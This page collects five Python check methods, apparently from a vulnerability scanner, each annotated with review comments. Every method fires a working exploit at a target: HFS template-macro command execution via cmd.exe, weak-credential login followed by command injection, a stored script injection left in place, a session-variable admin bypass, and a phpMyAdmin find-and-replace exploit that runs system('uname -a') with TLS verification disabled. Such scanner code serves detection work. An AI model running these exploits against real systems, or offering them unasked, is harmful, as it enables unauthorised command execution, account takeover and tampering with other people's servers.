コード例 #1
    def verify(self) -> None:
        """Probe ``self.target`` with two template-style query strings.

        The target URL is rebuilt from ``self.target`` plus the ``base_path``
        option.  Request 1 carries ``{.exec|cmd.exe ...}`` macros that delete
        and re-create a file named ``res`` holding the marker ``123456test``;
        request 2 carries a ``{.cookie|...{.load|res.}.}`` macro that asks the
        server to copy ``res`` into a response cookie.  The issue is reported
        when the marker shows up in ``Set-Cookie``.

        Side effects on the target, if the macros are interpreted: a file
        ``res`` is removed and written next to the served content -- an
        artifact defenders can look for.  Any exception is logged through
        ``self.output.info`` and swallowed; nothing is returned.
        """
        # Join target and base_path with exactly one '/' between them.
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Query string 1: two exec macros (remove 'res', then write the
            # marker into a fresh 'res').
            exec_payload = "/?search==%00{.exec|cmd.exe /c del res.}{.exec|cmd.exe /c echo>res 123456test.}"
            # Query string 2: macro that loads 'res' into a cookie named 'out'.
            check_payload = "/?search==%00{.cookie|out|value={.load|res.}.}"

            attack_url = self.target

            # One Session so cookies from request 1 are carried into request 2.
            # headers={} does not clear requests' own default headers.
            s = requests.Session()
            s.get(attack_url + exec_payload, headers={})
            r = s.get(attack_url + check_payload, headers={})
            # Absent Set-Cookie -> "" (header looked up twice; equivalent to
            # r.headers.get('set-cookie', '')).
            check_cookie = r.headers.get('set-cookie') if r.headers.get(
                'set-cookie') else ""
            if "123456test" in check_cookie:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch: network or parsing failures are logged, not raised.
            self.output.info('执行异常{}'.format(e))
コード例 #2
    def verify(self) -> None:
        """Two-stage check: weak login at ``/home/login``, then ``/3g/g3/log``.

        Stage 1 POSTs ``post_data`` (username and password are the literal
        masked strings ``'******'`` -- presumably redacted on this page; the
        asterisks are what is actually sent) and treats a response body of
        exactly ``'1'`` as a successful login, emitting a warning.
        Stage 2, only after a successful login, POSTs ``code_exec`` (a ``line``
        field containing ``1|echo 'vuln'``) to ``/3g/g3/log`` and reports the
        ``rce`` entry when ``'vuln'`` appears in the response text.

        ``self.vuln`` is indexed here as a mapping (``['auth']``, ``['rce']``),
        unlike the attribute style used by other examples on this page.
        Exceptions are logged via ``self.output.info`` and swallowed.
        """
        # Join target and base_path with exactly one '/' between them.
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        post_data = {'username': '******', 'password': '******'}
        code_exec = {'line': '1|echo \'vuln\''}

        try:
            # self.vuln: the vulnerability entries this scan is checking for
            # self.target: the scan target
            path = '{url}/home/login'.format(url=self.target)
            s = requests.Session()
            # self.output.info: prints execution log / progress information
            self.output.info('使用用户信息 {up} 访问 {path}'.format(path=path,
                                                            up=post_data))
            response = s.post(path, data=post_data)

            # Exact-match on the body '1' is the login-success signal.
            if response.text == '1':
                # self.output.warn: prints suspected-issue information found
                # while scanning for a specific vulnerability
                self.output.warn(self.vuln['auth'],
                                 '发现弱口令 {up}'.format(up=post_data))

                path = self.target + '/3g/g3/log'
                self.output.info('发送 payload={0} 到 {1}'.format(
                    code_exec, path))
                result = s.post(path, data=code_exec)

                # NOTE(review): the marker 'vuln' is also part of the request
                # itself, so a server that merely echoes the 'line' field back
                # would satisfy this test without executing anything.
                if 'vuln' in result.text:
                    # self.output.report: prints confirmed vulnerability information
                    self.output.report(
                        self.vuln['rce'],
                        "目标 {url} 存在 /3g/g3/log 任意命令执行漏洞".format(
                            url=self.target))
        except Exception as e:
            # Broad catch: failures are logged, not raised.
            self.output.info('执行异常{}'.format(e))
コード例 #3
<![CDATA[
    def verify(self) -> None:
        """Stored-script check against the album-edit page of ``self.target``.

        Sends ``PostData`` -- whose ``albumtitle`` is a literal
        ``<script>...</script>`` marker -- to ``/usercpspacemanagealbum.aspx``
        (first as a GET with a body and empty Basic-Auth credentials, then as a
        POST), fetches the album page again and reports the issue if the
        marker comes back verbatim, i.e. without HTML encoding.

        Side effects on the target: the album title is overwritten with the
        marker and is not restored afterwards.  Always returns ``None``;
        exceptions are logged through ``self.output.info`` and swallowed.
        """
        # Join target and base_path with exactly one '/' between them.
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            session = requests.Session()
            path = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32'
            UA = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'
            Referer = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32'
            # Marker that must survive unescaped in the page for a positive result.
            payload = '''<script>console.log(document.cookie)</script>'''

            # Empty Basic-Auth credentials; whether they authenticate cannot be
            # told from here.
            username = ''
            password = ''
            Host = self.target
            Url = Host + path
            Referer_url = self.target + Referer

            Auth = requests.auth.HTTPBasicAuth(username, password)

            # Note the 'albumid' in the form body (302) differs from the one in
            # the query string (32).
            PostData = {
                'albumtitle': payload,
                'albumid': '302',
                'active': '',
                'albumcate': '2',
                'albumdescription': '',
                'type': 0,
                'password': '',
                'Submit': '确定'}
            Header = {'User-Agent': UA, 'Referer': Referer_url,
                      'X-Requested-With': 'XMLHttpRequest'}

            # Login and get session
            # NOTE(review): a GET carrying a form body; the response is not inspected.
            session.get(Url, data=PostData, auth=Auth, headers=Header)
            # post editor to dz
            session.post(Url, data=PostData, headers=Header)
            # get result
            r = session.get(
                '{}/usercpspacemanagealbum.aspx'.format(Host), headers=Header)
            # Substring match: an encoded copy (&lt;script&gt;) would not match.
            if payload in r.text:
                #args['success'] = True
                #args['poc_ret']['vul_url'] = Url
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
            return None

        except Exception as e:
            # Broad catch: failures are logged, not raised.
            self.output.info('执行异常{}'.format(e))
]]>
コード例 #4
    def verify(self) -> None:
        """Check whether ``/admin/admin.php`` renders admin content for a crafted body.

        Sends ``postdata`` -- a raw form-encoded string setting
        ``_SESSION[login_in]``, ``_SESSION[admin]`` and ``_SESSION[login_time]``
        -- first to ``/index.php`` (response ignored) and then to
        ``/admin/admin.php``.  The issue is reported when both admin-menu link
        fragments (``admin_form.php?...list_order`` and ``admin_main.php?nav=main``)
        appear in the second response.  This looks like a test for session
        values being taken from request parameters, but that cannot be
        confirmed from this block alone.

        Exceptions are logged through ``self.output.info`` and swallowed.
        """
        # Join target and base_path with exactly one '/' between them.
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            # Body is sent as a pre-encoded string (note the trailing CRLF),
            # not as a dict, so requests does not re-encode it.
            postdata = "_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n"
            session = requests.Session()
            # Priming request; its response (_req) is never inspected.
            _req = session.post(self.target + "/index.php", data=postdata)
            # login test
            response = session.post(self.target+ "/admin/admin.php", data=postdata)
            content = response.text
            # Both admin-page link fragments must be present to count as a hit.
            if "admin_form.php?action=form_list&nav=list_order" in content and "admin_main.php?nav=main" in content:
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name,url=self.target+"/admin/admin.php"))

        except Exception as e:
            # Broad catch: failures are logged, not raised.
            self.output.info('执行异常{}'.format(e))
コード例 #5
    def verify(self) -> None:
        """Drive the ``tbl_find_replace.php`` flow of a ``pma_*``-style login.

        Steps, all over one ``requests.Session`` with TLS verification turned
        off:

        1. POST empty ``pma_username``/``pma_password`` to ``/?lang=en`` and
           scrape a 32-character ``token`` from the HTML.
        2. Unless ``custom_table`` is set, create table ``prgpwn`` in database
           ``test`` through ``/import.php`` with one ``varchar`` row whose
           value is the hex literal ``302F6500``; an "already exists" error is
           tolerated, any other error exits.
        3. POST the ``exploit`` form to ``/tbl_find_replace.php`` (``useRegex``
           on, a ``find`` value containing a NUL byte, ``payload`` as the
           replacement) and print the tail of the JSON ``message``.

        Side effects on the target: the ``prgpwn`` table is left behind in the
        ``test`` database -- an artifact defenders can look for.  Process
        side effects: the ``sys.exit`` calls terminate the whole scanner, and
        ``SystemExit`` is not caught by the ``except Exception`` below.
        Progress in this block is written with ``print`` rather than
        ``self.output``.
        """
        # Join target and base_path with exactly one '/' between them.
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            url_to_pma = self.target
            payload = "system('uname -a');"
            # Empty credentials are sent as-is.
            uname = ''
            upass = ''
            db = 'test'
            token = False
            custom_table = False
            table = 'prgpwn'
            size = 32
            s = requests.Session()
            # you can manually add proxy support it's very simple ;)
            # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
            # Disables certificate validation: the scanner accepts any TLS
            # certificate, so its own traffic (including the token) can be
            # intercepted on the path to the target.
            s.verify = False
            sql = '''CREATE TABLE `{0}` (
            `first` varchar(10) CHARACTER SET utf8 NOT NULL
            ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
            INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
            '''.format(table)
            resp = s.post(url_to_pma + "/?lang=en",
                          dict(pma_username=uname, pma_password=upass))
            # NOTE(review): `is 200` is an identity test, not equality; it
            # only works because CPython caches small ints. `== 200` is meant.
            if resp.status_code is 200:
                # Crude scrape: the 32 characters following the first "token=".
                token_place = resp.text.find("token=") + 6
                token = resp.text[token_place:token_place + 32]
            if token is False:
                # self.output.info("Cannot get valid authorization token.")
                # Exits the whole process, not just this check.
                sys.exit(1)

            if custom_table is False:
                data = {
                    "is_js_confirmed": "0",
                    "db": db,
                    "token": token,
                    "pos": "0",
                    "sql_query": sql,
                    "sql_delimiter": ";",
                    "show_query": "0",
                    "fk_checks": "0",
                    "SQL": "Go",
                    "ajax_request": "true",
                    "ajax_page_request": "true",
                }
                # Cookies are passed explicitly although the Session already
                # holds them.
                resp = s.post(url_to_pma + "/import.php",
                              data,
                              cookies=requests.utils.dict_from_cookiejar(
                                  s.cookies))
                if resp.status_code == 200:
                    if "success" in resp.json():
                        if resp.json()["success"] is False:
                            # Extract the text between <code> and </code> in
                            # the JSON "error" field.
                            first = resp.json(
                            )["error"][resp.json()["error"].find("<code>") +
                                       6:]
                            error = first[:first.find("</code>")]
                            if "already exists" in error:
                                print(error)
                            else:
                                print(("ERROR: " + error))
                                sys.exit(1)
            # build exploit
            # 'find' contains an embedded NUL byte; 'replaceWith' is the
            # payload string defined above.
            exploit = {
                "db": db,
                "table": table,
                "token": token,
                "goto": "sql.php",
                "find": "0/e\0",
                "replaceWith": payload,
                "columnIndex": "0",
                "useRegex": "on",
                "submit": "Go",
                "ajax_request": "true"
            }
            resp = s.post(url_to_pma + "/tbl_find_replace.php",
                          exploit,
                          cookies=requests.utils.dict_from_cookiejar(
                              s.cookies))
            if resp.status_code == 200:
                # Everything after the first "</a>" (plus 4 characters) in the
                # JSON "message" field is treated as the result text.
                result = resp.json(
                )["message"][resp.json()["message"].find("</a>") + 8:]
                if len(result):
                    print(("result: " + result))
                    sys.exit(0)
                print(
                    "Exploit failed!\n"
                    "Try to manually set exploit parameters like --table, --database and --token.\n"
                    "Remember that servers with PHP version greater than 5.4.6"
                    " is not exploitable, because of warning about null byte in regexp"
                )
                sys.exit(1)

            # NOTE(review): every 200 path above exits the process, so this
            # report is only reached when the find/replace POST did NOT return
            # 200 -- confirm that is the intended reporting condition.
            self.output.report(
                self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target,
                                                         name=self.vuln.name))
        except Exception as e:
            # Broad catch: failures are logged, not raised (SystemExit passes through).
            self.output.info('执行异常:{}'.format(e))